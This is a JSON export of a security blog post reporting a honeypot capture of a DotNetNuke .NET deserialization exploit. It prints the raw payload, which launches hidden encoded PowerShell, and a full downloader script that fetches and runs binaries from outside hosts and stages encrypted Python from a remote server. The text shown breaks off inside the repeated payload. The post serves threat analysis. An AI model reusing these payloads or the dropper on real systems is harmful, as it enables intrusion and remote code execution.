{"id":498,"date":"2017-12-11T02:55:52","date_gmt":"2017-12-11T02:55:52","guid":{"rendered":"http:\/\/www.cloudcoffer.com\/?p=498"},"modified":"2024-07-01T03:04:03","modified_gmt":"2024-07-01T03:04:03","slug":"honeypot-extract","status":"publish","type":"post","link":"https:\/\/www.cloudcoffer.com\/?p=498","title":{"rendered":"Honeypot Extraction -Windows .NET Framework"},"content":{"rendered":"

<\/h3>\n

Date of Detection:<\/strong><\/h3>\n

2017.12.11<\/p>\n

 <\/p>\n

Source IP Addresses:<\/strong><\/h3>\n

173.212.217.181\u3001149.255.35.91<\/p>\n

 <\/p>\n

Attack Raw Pattern:<\/strong><\/h3>\n
DNNPersonalization=<profile><item key=\\\"key\\\" type=\\\"System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.ObjectStateFormatter, System.Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=2.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\\\"><ExpandedWrapperOfObjectStateFormatterObjectDataProvider> <ProjectedProperty0> <ObjectInstance p3:type=\\\"ObjectStateFormatter\\\" xmlns:p3=\\\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\\\" \/> <MethodName>Deserialize<\/MethodName> <MethodParameters> <anyType xmlns:q1=\\\"http:\/\/www.w3.org\/2001\/XMLSchema\\\" p5:type=\\\"q1:string\\\" xmlns:p5=\\\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\\\">\/wEy8ykAAQAAAP\/\/\/\/8BAAAAAAAAAAwCAAAASVN5c3RlbSwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAAIQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuU29ydGVkU2V0YDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAVDb3VudAhDb21wYXJlcgdWZXJzaW9uBUl0ZW1zAAMABgiNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQgCAAAAAgAAAAkDAAAAAgAAAAkEAAAABAMAAACNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQEAAAALX2NvbXBhcmlzb24DIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIJBQAAABEEAAAAAgAAAAYGAAAAoRgvYyBDOlxXaW5kb3dzXFN5c3RlbTMyXFdpbmRvd3NQb3dlclNoZWxsXHYxLjBccG93ZXJzaGVsbC5leGUgLVdpbmRvd1N0eWxlIEhpZGRlbiAtZW5jb2RlIEpBQmxBRDBBSndCTEFFRUFRUUJ0QUVFQVF3Qm5BRUVBU1FCbkFFSUFOd0JCQUVRQVJRQkJBR1lBVVFCQ0FEY0FRUUJFQUVrQVFRQm1BRkVBUWdBM0FFRUFSQUJCQUVFQVpnQlJBRUVBYVFCQkFFTUFNQUJCQUZvQVp3QkJBR2NBUVFCREFHTUFRUUJhQUZFQVFnQnFBRUVBU0FCUkFFRUFTZ0IzQUVFQWN3QkJBRU1BWXdCQkFGUUFad0JDQUd3QVFRQklBR01BUVFCS0FIY0FRUUJ6QUVFQVF3Qm5BRUVBU1FCbkFFSUFOd0JCQUVRQVJRQkJBR1lBVVFCQ0FEY0FRUUJFQUVFQVFRQm1BRkVBUVFCcEFFRUFRd0JCQUVFQVRBQlJBRUlBYlFCQkFFTUFZd0JCQUdFQVp3QkJBRzRBUVFCREFIY0FRUUJLQUhjQVFRQjBBRUVBUlFBNEFFRUFXUUJuQUVFQWJnQkJBRU1BYXdCQkFFc0FVUUJCQUdjQVFRQkRBR2NBUVFCSkFHY0FRZ0EzQUVFQVJBQkZBRUVBWmdCUkFFSUFOd0JCQUVRQVNRQkJBR1lBVVFCQ0FEY0FRUUJFQUUwQVFRQm1BRkVBUWdBM0FFRUFSQUJSQUVFQVpnQlJBRUlBTndCQkFFUUFRUUJCQUdZQVVRQkJBR2tBUVFCREFEQUFRUUJhQUdjQVFRQm5BRUVBUXdCakFFRUFZZ0JuQUVJQU1BQkJBRU1BWXdCQkFFd0FRUUJCQUc0QVFRQkdBRTBBUVFCS0FIY0FRUUJ6QUVFQVF3Qm5BRUVBU1FCbkFFSUFOd0JCQUVRQVJRQkJBR1lBVVFCQ0FEY0FRUUJFQUVFQVFRQm1BRkVBUVFCcEFFRUFRd0JCQUVFQVRBQlJBRUlBYlFCQkFFTUFZd0JCQUdRQVFRQkNBR3dBUVFCREFHTUFRUUJNQUVFQVFRQnVBRUVBU0FCckFFRUFZd0IzQUVFQWJnQkJBRU1BYXdCQkFFd0FRUUJCQUc4QVFRQkRBRWtBUVFCbEFIY0FRUUIzQUVFQVNBQXdBRUVBWlFCM0FFRUFlUUJCQUVnQU1BQkJBR1VBZHdCQkFIZ0FRUUJJQURBQVFRQkpBR2NBUVFCMEFFRUFSd0JaQUVFQVNnQjNBRUlBZEFCQkFFTUFZd0JCQUV3QVFRQkJBRzRBUVFCSEFGVUFRUUJaQUdjQVFnQkVBRUVBUndCM0FFRUFZUUJSQUVFQWJnQkJBRU1BZHdCQkFFb0Fkd0JCQUhVQVFRQkZBRFFBUVFCYUFGRUFRZ0F3QUVFQVF3QTBBRUVBVmdCM0FFRUFiZ0JCQUVNQWF3QkJBRXdBUVFCQkFHNEFRUUJIQUZVQVFRQktBSGNBUVFCd0FFRUFRd0JyQUVFQVRBQm5BRUVBYndCQkFFTUFTUUJCQUdVQWR3QkJBSGdBUVFCSUFEQUFRUUJsQUhjQVFRQjZBRUVBU0FBd0FFRUFaUUIzQUVFQWVRQkJBRWdBTUFCQkFHVUFkd0JCQUhjQVFRQklBREFBUVFCSkFHY0FRUUJuQUVFQVF3QXdBRUVBV2dCbkFFRUFad0JCQUVNQVp3QkJBRWtBWndCQ0FEY0FRUUJFQUVVQVFRQm1BRkVBUWdBM0FFRUFSQUJCQUVFQVpnQlJBRUlBTndCQkFFUUFTUUJCQUdZQVVRQkJBR2tBUVFCREFFRUFRUUJNQUZFQVFnQnRBRUVBUXdCakFFRUFaQUJCQUVJQWVRQkJBRWNBYXdCQkFFb0Fkd0JCQUhNQVFRQkRBR01BUVFCWkFGRUFRZ0JyQUVFQVJnQk5BRUVBU2dCM0FFRUFjd0JCQUVNQVl3QkJBR0lBWndCQ0FHNEFRUUJEQUdNQVFRQkxBRkVBUVFCekFFRUFRd0JqQUVFQVVnQkJBRUVBYmdCQkFFTUFkd0JCQUVzQVFRQkJBR2tBUVFCSUFITUFRUUJOQUZFQVFnQTVBRUVBU0FCekFFRUFUUUJCQUVJQU9RQkJBRU1BU1FCQkFFa0FRUUJCQUhRQVFRQkhBRmtBUVFCS0FIY0FRZ0IxQUVFQVJ3QjNBRUVBWWdCM0FFRUFiZ0JCQUVNQWR3QkJBRW9BZHdCQ0FETUFRUUJEQUdNQVFRQkxBRkVBUVFCekFFRUFRd0JqQUVFQVlnQjNBRUVBYmdCQkFFTUFhd0JCQUV3QVp3QkJBR2tBUVFCSEFHc0FRUUJaQUVFQVFnQlBBRUVBUmdCWkFFRUFWQUIzQUVJQVp3QkJBRVVBY3dCQkFGb0FVUUJCQUdrQVFRQkRBR2NBUVFCTEFFRUFRUUJwQUVFQVNBQnpBRUVBVFFCQkFFSUFPUUJCQUVnQWN3QkJBRTRBUVFCQ0FEa0FRUUJJQUhNQVFRQk5BSGNBUWdBNUFFRUFTQUJ6QUVFQVRRQm5BRUlBT1FCQkFFZ0Fjd0JCQUU0QVVRQkNBRGtBUVFCSUFITUFRUUJOQUZFQVFnQTVBRUVBUXdCSkFFRUFUQUJSQUVJQWJRQkJBRU1BUVFCQkFFc0FRUUJCQUdrQVFRQklBSE1BUVFCTkFFRUFRZ0E1QUVFQVNBQnpBRUVBVFFCUkFFSUFPUUJCQUVNQVNRQkJBRWtBUVFCQkFIUUFRUUJIQUZrQVFRQktBSGNBUWdCdkFFRUFTQUJSQUVFQVpBQkJBRUVBYmdCQkFFTUFkd0JCQUVvQWR3QkNBSGNBUVFCRUFHOEFRUUJLQUhjQVFRQndBRUVBUXdCM0FFRUFTZ0IzQUVJQWR3QkJBRWdBVFFCQkFFMEFVUUJCQUc0QVFRQkRBSGNBUVFCS0FIY0FRUUF6QUVFQVJ3QnZBRUVBU2dCM0FFRUFjd0JCQUVNQVl3QkJBRm9BVVFCQ0FIUUFRUUJIQUZVQVFRQktBSGNBUVFCekFFRUFRd0JuQUVFQVNRQm5BRUlBTndCQkFFUUFRUUJCQUdZQVVRQkNBRGNBUVFCRUFFVUFRUUJtQUZFQVFRQnBBRUVBUXdBd0FFRUFXZ0JuQUVFQWJnQkJBRU1BT0FCQkFFd0Fkd0JDQURNQVFRQklBR01BUVFCa0FIY0FRUUIxQUVFQVF3QmpBRUVBVEFCQkFFRUFiZ0JCQUVjQVZRQkJBRW9BZHdCQkFIQUFRUUJEQUhjQVFRQkxBRUVBUVFCcEFFRUFTQUJ6QUVFQVRRQkJBRUlBT1FCQkFFZ0Fjd0JCQUUwQVVRQkNBRGtBUVFCREFFa0FRUUJNQUZFQVFnQnRBRUVBUXdCQkFFRUFTZ0IzQUVFQWRRQkJBRWdBWXdCQkFHRUFVUUJDQUhVQVFRQkRBRGdBUVFCakFIY0FRZ0JxQUVFQVF3QmpBRUVBVEFCQkFFRUFiZ0JCQUVnQVdRQkJBRXdBWndCQkFHNEFRUUJEQUdzQVFRQkxBRkVBUVFCd0FFRUFTQUIzQUVFQVRBQm5BRUVBYndCQkFFTUFTUUJCQUdVQWR3QkJBSGdBUVFCSUFEQUFRUUJsQUhjQVFRQjNBRUVBU0FBd0FFRUFTUUJuQUVFQWRBQkJBRWNBV1FCQkFFb0Fkd0JDQUd3QVFRQklBR2NBUVFCS0FIY0FRUUJ6QUVFQVF3QmpBRUVBWVFCUkFFRUFiZ0JCQUVNQWF3QkJBQ2NBT3dBZ0FITUFkQUJoQUhJQWRBQWdBRU1BT2dCY0FGY0FhUUJ1QUdRQWJ3QjNBSE1BWEFCVEFIa0Fjd0IwQUdVQWJRQXpBRElBWEFCWEFHa0FiZ0JrQUc4QWR3QnpBRkFBYndCM0FHVUFjZ0JUQUdnQVpRQnNBR3dBWEFCMkFERUFMZ0F3QUZ3QWNBQnZBSGNBWlFCeUFITUFhQUJsQUd3QWJBQXVBR1VBZUFCbEFDQUFMUUJYQUdrQWJnQmtBRzhBZHdCVEFIUUFlUUJzQUdVQUlBQklBR2tBWkFCa0FHVUFiZ0FnQUNjQUxRQmxBRzRBWXdCdkFHUUFaUUFuQUN3QUlBQWtBR1VBSUFBZ0FDQUEGBwAAABtDOlxXaW5kb3dzXFN5c3RlbTMyXGNtZC5leGUEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA+U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw==<\/anyType> <\/MethodParameters> <\/ProjectedProperty0> <\/ExpandedWrapperOfObjectStateFormatterObjectDataProvider><\/item><\/profile>;<\/pre>\n
 <\/p>\n
Target System:<\/strong><\/h3>\n
Windows with .NET Framework<\/p>\n
 <\/p>\n
Malicious File Path from the Exploit:<\/strong><\/h3>\n
For some variations of the attack, the exploits download malware, execute it, and then delete the file. This is one of the URLs that contain the malware: http:\/\/149.255.35.91\/larva.sh<\/span>.<\/p>\n
The content of the sh file is as follows.<\/p>\n
#!\/bin\/sh\r\npsarg=\"\"\r\nif [[ -n `ps -lf` ]]; then\r\n psarg=\"-lf\"\r\nelif [[ -n `ps -au` ]]; then\r\n psarg=\"-au\"\r\nfi\r\n\r\nmutex=\"21914\"\r\nmutex_exist=''\r\nif [[ $psarg ]]; then\r\n if [[ `ps $psarg | grep -v grep | grep -c $mutex ` -gt 0 ]]; then\r\n mutex_exist=1\r\n else\r\n mutex_exist=''\r\n fi\r\nfi\r\n\r\nif [[ $mutex_exist -gt 0 ]]; then\r\n echo mutex exist, quiting script\r\n exit\r\nelse\r\n echo mutex not exist, starting a new one\r\n sleep 800.$mutex &\r\nfi\r\n\r\nsh -c \"(cat < \/dev\/tcp\/www.eeme7j.win\/23546 > \/tmp\/mule || wget http:\/\/www.eeme7j.win\/mule -O \/tmp\/mule || curl -s http:\/\/www.eeme7j.win\/mule -o \/tmp\/mule) && chmod +x \/tmp\/mule && (nohup \/tmp\/mule &) && sleep 1 && rm -f \/tmp\/mule\" &\r\nrm -f \/tmp\/larva.sh\r\n\r\nfunction tcp_download()\r\n{\r\n FileServer=$1\r\n Port=$2\r\n Target=$3\r\n cat < \/dev\/tcp\/$FileServer\/$Port > $Target\r\n}\r\nfunction http_download()\r\n{\r\n Url=$1\r\n Target=$2\r\n wget $Url -O $Target || curl -s $Url -o $Target\r\n}\r\nfunction download()\r\n{\r\n FileServer=$1\r\n Port=$2\r\n FileName=$3\r\n Target=$4\r\n tcp_download $FileServer $Port $Target || http_download http:\/\/$FileServer\/$FileName $Target\r\n}\r\nfunction download_and_execute()\r\n{\r\n FileServer=$1\r\n Port=$2\r\n FileName=$3\r\n Target=$4\r\n download $FileServer $Port $FileName $Target\r\n chmod +x $Target\r\n nohup $Target &\r\n sleep 1\r\n rm -f $Target\r\n}\r\n\r\necho \"from subprocess import *;p = Popen('python',stdin=PIPE); p.stdin.write(\\\"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly80Ni4yMS4xNDcuMTMzOjgwMDEnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPW84MkZ5MU11QWE5M0lMVnYwZS9PQ29qb2M2ST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEpLnJlYWQoKTsKSVY9YVswOjRdO2RhdGE9YVs0Ol07a2V5PUlWKydlfU9CdStqRENOP152bVZnOzoxLSFMeG4jR2M8PXs5Syc7UyxqLG91dD1yYW5nZSgyNTYpLDAsW10KZm9yIGkgaW4gcmFuZ2UoMjU2KToKICAgIGo9KGorU1tpXStvcmQoa2V5W2klbGVuKGtleSldKSklMjU2CiAgICBTW2ldLFNbal09U1tqXSxTW2ldCmk9aj0wCmZvciBjaGFyIGluIGRhdGE6CiAgICBpPShpKzEpJTI1NgogICAgaj0oaitTW2ldKSUyNTYKICAgIFNbaV0sU1tqXT1TW2pdLFNbaV0KICAgIG91dC5hcHBlbmQoY2hyKG9yZChjaGFyKV5TWyhTW2ldK1Nbal0pJTI1Nl0pKQpleGVjKCcnLmpvaW4ob3V0KSk='));\\\");\" | python\r\n\r\nwhile true; do\r\n sleep 3600.$mutex &\r\n sleep 3600.$mutex\r\n download_and_execute www.eeme7j.win 23547 mule \/tmp\/mule\r\n pkill stratum\r\ndone<\/pre>\n
\u00a0<\/strong><\/p>\n
Analysis:<\/strong><\/h3>\n
First, we decode the exploit by Base64.<\/p>\n
The first-phased decoded message is as follows.<\/p>\n
DNNPersonalization=<profile><item key=\"key\" type=\"System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.ObjectStateFormatter, System.Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=2.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\"><ExpandedWrapperOfObjectStateFormatterObjectDataProvider> <ProjectedProperty0> <ObjectInstance p3:type=\"ObjectStateFormatter\" xmlns:p3=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\" \/> <MethodName>Deserialize<\/MethodName> <MethodParameters> <anyType xmlns:q1=\"http:\/\/www.w3.org\/2001\/XMLSchema\" p5:type=\"q1:string\" xmlns:p5=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\">\/wEy8ykAAQAAAP\/\/\/\/8BAAAAAAAAAAwCAAAASVN5c3RlbSwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAAIQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuU29ydGVkU2V0YDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAVDb3VudAhDb21wYXJlcgdWZXJzaW9uBUl0ZW1zAAMABgiNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQgCAAAAAgAAAAkDAAAAAgAAAAkEAAAABAMAAACNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQEAAAALX2NvbXBhcmlzb24DIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIJBQAAABEEAAAAAgAAAAYGAAAAoRgvYyBDOlxXaW5kb3dzXFN5c3RlbTMyXFdpbmRvd3NQb3dlclNoZWxsXHYxLjBccG93ZXJzaGVsbC5leGUgLVdpbmRvd1N0eWxlIEhpZGRlbiAtZW5jb2RlIEpBQmxBRDBBSndCTEFFRUFRUUJ0QUVFQVF3Qm5BRUVBU1FCbkFFSUFOd0JCQUVRQVJRQkJBR1lBVVFCQ0FEY0FRUUJFQUVrQVFRQm1BRkVBUWdBM0FFRUFSQUJCQUVFQVpnQlJBRUVBYVFCQkFFTUFNQUJCQUZvQVp3QkJBR2NBUVFCREFHTUFRUUJhQUZFQVFnQnFBRUVBU0FCUkFFRUFTZ0IzQUVFQWN3QkJBRU1BWXdCQkFGUUFad0JDQUd3QVFRQklBR01BUVFCS0FIY0FRUUJ6QUVFQVF3Qm5BRUVBU1FCbkFFSUFOd0JCQUVRQVJRQkJBR1lBVVFCQ0FEY0FRUUJFQUVFQVFRQm1BRkVBUVFCcEFFRUFRd0JCQUVFQVRBQlJBRUlBYlFCQkFFTUFZd0JCQUdFQVp3QkJBRzRBUVFCREFIY0FRUUJLQUhjQVFRQjBBRUVBUlFBNEFFRUFXUUJuQUVFQWJnQkJBRU1BYXdCQkFFc0FVUUJCQUdjQVFRQkRBR2NBUVFCSkFHY0FRZ0EzQUVFQVJBQkZBRUVBWmdCUkFFSUFOd0JCQUVRQVNRQkJBR1lBVVFCQ0FEY0FRUUJFQUUwQVFRQm1BRkVBUWdBM0FFRUFSQUJSQUVFQVpnQlJBRUlBTndCQkFFUUFRUUJCQUdZQVVRQkJBR2tBUVFCREFEQUFRUUJhQUdjQVFRQm5BRUVBUXdCakFFRUFZZ0JuQUVJQU1BQkJBRU1BWXdCQkFFd0FRUUJCQUc0QVFRQkdBRTBBUVFCS0FIY0FRUUJ6QUVFQVF3Qm5BRUVBU1FCbkFFSUFOd0JCQUVRQVJRQkJBR1lBVVFCQ0FEY0FRUUJFQUVFQVFRQm1BRkVBUVFCcEFFRUFRd0JCQUVFQVRBQlJBRUlBYlFCQkFFTUFZd0JCQUdRQVFRQkNBR3dBUVFCREFHTUFRUUJNQUVFQVFRQnVBRUVBU0FCckFFRUFZd0IzQUVFQWJnQkJBRU1BYXdCQkFFd0FRUUJCQUc4QVFRQkRBRWtBUVFCbEFIY0FRUUIzQUVFQVNBQXdBRUVBWlFCM0FFRUFlUUJCQUVnQU1BQkJBR1VBZHdCQkFIZ0FRUUJJQURBQVFRQkpBR2NBUVFCMEFFRUFSd0JaQUVFQVNnQjNBRUlBZEFCQkFFTUFZd0JCQUV3QVFRQkJBRzRBUVFCSEFGVUFRUUJaQUdjQVFnQkVBRUVBUndCM0FFRUFZUUJSQUVFQWJnQkJBRU1BZHdCQkFFb0Fkd0JCQUhVQVFRQkZBRFFBUVFCYUFGRUFRZ0F3QUVFQVF3QTBBRUVBVmdCM0FFRUFiZ0JCQUVNQWF3QkJBRXdBUVFCQkFHNEFRUUJIQUZVQVFRQktBSGNBUVFCd0FFRUFRd0JyQUVFQVRBQm5BRUVBYndCQkFFTUFTUUJCQUdVQWR3QkJBSGdBUVFCSUFEQUFRUUJsQUhjQVFRQjZBRUVBU0FBd0FFRUFaUUIzQUVFQWVRQkJBRWdBTUFCQkFHVUFkd0JCQUhjQVFRQklBREFBUVFCSkFHY0FRUUJuQUVFQVF3QXdBRUVBV2dCbkFFRUFad0JCQUVNQVp3QkJBRWtBWndCQ0FEY0FRUUJFQUVVQVFRQm1BRkVBUWdBM0FFRUFSQUJCQUVFQVpnQlJBRUlBTndCQkFFUUFTUUJCQUdZQVVRQkJBR2tBUVFCREFFRUFRUUJNQUZFQVFnQnRBRUVBUXdCakFFRUFaQUJCQUVJQWVRQkJBRWNBYXdCQkFFb0Fkd0JCQUhNQVFRQkRBR01BUVFCWkFGRUFRZ0JyQUVFQVJnQk5BRUVBU2dCM0FFRUFjd0JCQUVNQVl3QkJBR0lBWndCQ0FHNEFRUUJEQUdNQVFRQkxBRkVBUVFCekFFRUFRd0JqQUVFQVVnQkJBRUVBYmdCQkFFTUFkd0JCQUVzQVFRQkJBR2tBUVFCSUFITUFRUUJOQUZFQVFnQTVBRUVBU0FCekFFRUFUUUJCQUVJQU9RQkJBRU1BU1FCQkFFa0FRUUJCQUhRQVFRQkhBRmtBUVFCS0FIY0FRZ0IxQUVFQVJ3QjNBRUVBWWdCM0FFRUFiZ0JCQUVNQWR3QkJBRW9BZHdCQ0FETUFRUUJEQUdNQVFRQkxBRkVBUVFCekFFRUFRd0JqQUVFQVlnQjNBRUVBYmdCQkFFTUFhd0JCQUV3QVp3QkJBR2tBUVFCSEFHc0FRUUJaQUVFQVFnQlBBRUVBUmdCWkFFRUFWQUIzQUVJQVp3QkJBRVVBY3dCQkFGb0FVUUJCQUdrQVFRQkRBR2NBUVFCTEFFRUFRUUJwQUVFQVNBQnpBRUVBVFFCQkFFSUFPUUJCQUVnQWN3QkJBRTRBUVFCQ0FEa0FRUUJJQUhNQVFRQk5BSGNBUWdBNUFFRUFTQUJ6QUVFQVRRQm5BRUlBT1FCQkFFZ0Fjd0JCQUU0QVVRQkNBRGtBUVFCSUFITUFRUUJOQUZFQVFnQTVBRUVBUXdCSkFFRUFUQUJSQUVJQWJRQkJBRU1BUVFCQkFFc0FRUUJCQUdrQVFRQklBSE1BUVFCTkFFRUFRZ0E1QUVFQVNBQnpBRUVBVFFCUkFFSUFPUUJCQUVNQVNRQkJBRWtBUVFCQkFIUUFRUUJIQUZrQVFRQktBSGNBUWdCdkFFRUFTQUJSQUVFQVpBQkJBRUVBYmdCQkFFTUFkd0JCQUVvQWR3QkNBSGNBUVFCRUFHOEFRUUJLQUhjQVFRQndBRUVBUXdCM0FFRUFTZ0IzQUVJQWR3QkJBRWdBVFFCQkFFMEFVUUJCQUc0QVFRQkRBSGNBUVFCS0FIY0FRUUF6QUVFQVJ3QnZBRUVBU2dCM0FFRUFjd0JCQUVNQVl3QkJBRm9BVVFCQ0FIUUFRUUJIQUZVQVFRQktBSGNBUVFCekFFRUFRd0JuQUVFQVNRQm5BRUlBTndCQkFF